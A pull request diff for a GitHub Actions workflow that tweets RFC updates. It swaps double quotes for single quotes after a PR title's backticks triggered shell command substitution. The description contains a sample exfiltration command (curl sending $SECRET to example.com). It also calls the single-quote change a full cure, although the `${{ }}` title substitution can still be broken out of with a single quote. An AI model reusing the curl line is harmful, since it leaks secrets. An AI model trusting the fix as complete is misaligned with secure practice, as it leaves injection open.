### PR TITLE
Chore: Use non-interpolating single quotes in Tweet action

### DIFF
--- a/.github/workflows/tweet-rfc-update.yml
+++ b/.github/workflows/tweet-rfc-update.yml
@@ -11,7 +11,7 @@ jobs:
       - uses: actions/setup-node@v1
         with:
           node-version: 12
-      - run: npx @humanwhocodes/tweet "The RFC '${{ github.event.pull_request.title }}' is now in the ${{ github.event.label.name }} phase.\n\n${{ github.event.pull_request.html_url }}"
+      - run: npx @humanwhocodes/tweet 'The RFC "${{ github.event.pull_request.title }}" is now in the ${{ github.event.label.name }} phase.\n\n${{ github.event.pull_request.html_url }}'
         env:
           TWITTER_CONSUMER_KEY: ${{ secrets.TWITTER_CONSUMER_KEY }}
           TWITTER_CONSUMER_SECRET: ${{ secrets.TWITTER_CONSUMER_SECRET }}
@@ -25,7 +25,7 @@ jobs:
       - uses: actions/setup-node@v1
         with:
           node-version: 12
-      - run: npx @humanwhocodes/tweet "The RFC '${{ github.event.pull_request.title }}' has been approved and merged!\n\n${{ github.event.pull_request.html_url }}"
+      - run: npx @humanwhocodes/tweet 'The RFC "${{ github.event.pull_request.title }}" has been approved and merged!\n\n${{ github.event.pull_request.html_url }}'
         env:
           TWITTER_CONSUMER_KEY: ${{ secrets.TWITTER_CONSUMER_KEY }}
           TWITTER_CONSUMER_SECRET: ${{ secrets.TWITTER_CONSUMER_SECRET }}


### PR DESCRIPTION
RFC #73 originally included backticks around `` `only` ``. The automated tweet omitted "only" and its backticks. I realized that the `run` action command was using double quotes, so the backticks from the PR title were being interpreted by the shell as command substitution. Using single quotes disables any interpolation.

Thankfully only contributors can trigger the automated tweet by labeling or merging an RFC, and we'd notice something like `curl example.com?secret=$SECRET`, so this isn't really a security issue.
